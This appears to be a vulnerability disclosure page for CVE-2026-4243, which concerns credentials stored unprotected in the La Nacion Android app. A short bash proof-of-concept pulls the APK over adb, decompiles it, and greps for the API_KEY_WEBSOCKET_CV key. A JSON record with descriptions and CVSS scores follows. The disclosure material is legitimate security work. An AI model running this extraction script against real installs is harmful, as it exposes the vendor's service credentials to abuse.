CVE-2026-4243

#!/bin/bash # CVE-2026-4243 PoC - La Nacion App Credential Extraction # Requirements: Rooted Android device or ADB access # Step 1: Pull the APK from the device adb pull /data/app/com.lanacion.app/base.apk lanacion.apk # Step 2: Decompile the APK using apktool apktool d lanacion.apk -o decompiled_app # Step 3: Search for the vulnerable BuildConfig.java find decompiled_app -name "BuildConfig.java" -exec grep -l "API_KEY_WEBSOCKET_CV" {} \; # Step 4: Extract the credential cat decompiled_app/smali*/com/lanacion/clublanacion/BuildConfig.java | grep -A2 "API_KEY_WEBSOCKET_CV" # Alternative: Direct extraction from device (requires root) # adb shell # su # cat /data/data/com.lanacion.app/files/websocket_key.txt echo "Exploit completed. Check extracted credentials above."

{"cve": {"id": "CVE-2026-4243", "sourceIdentifier": "[email protected]", "published": "2026-03-16T15:16:26.963", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in La Nacion App 10.2.25 on Android. This impacts an unknown function of the file source/app/lanacion/clublanacion/BuildConfig.java of the component app.lanacion.activity. Executing a manipulation of the argument API_KEY_WEBSOCKET_CV can lead to unprotected storage of credentials. The attack can only be executed locally. A high complexity level is associated with this attack. The exploitability is said to be difficult. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha identificado una debilidad en la aplicación La Nación 10.2.25 en Android. Esto afecta a una función desconocida del archivo source/app/lanacion/clublanacion/BuildConfig.java del componente app.lanacion.activity. La ejecución de una manipulación del argumento API_KEY_WEBSOCKET_CV puede llevar al almacenamiento no protegido de credenciales. El ataque solo puede ejecutarse localmente. Un alto nivel de complejidad está asociado con este ataque. La explotabilidad se dice que es difícil. El exploit se ha puesto a disposición del público y podría usarse para ataques. El proveedor fue contactado tempranamente sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.1, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.5, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:H/Au:S/C:P/I:N/A:N", "baseScore": 1.0, "accessVector": "LOCAL", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 1.5, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-255"}, {"lang": "en", "value": "CWE-256"}]}], "references": [{"url": "https://vuldb.com/?ctiid.351185", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351185", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.771432", "source": "[email protected]"}, {"url": "https://www.notion.so/WebSocket-Credential-Leak-Leading-to-Potential-DDoS-Attacks-in-app-lanacion-activity-3192de3f97fb80f8add6c2247abeb4eb?source=copy_link", "source": "[email protected]"}]}}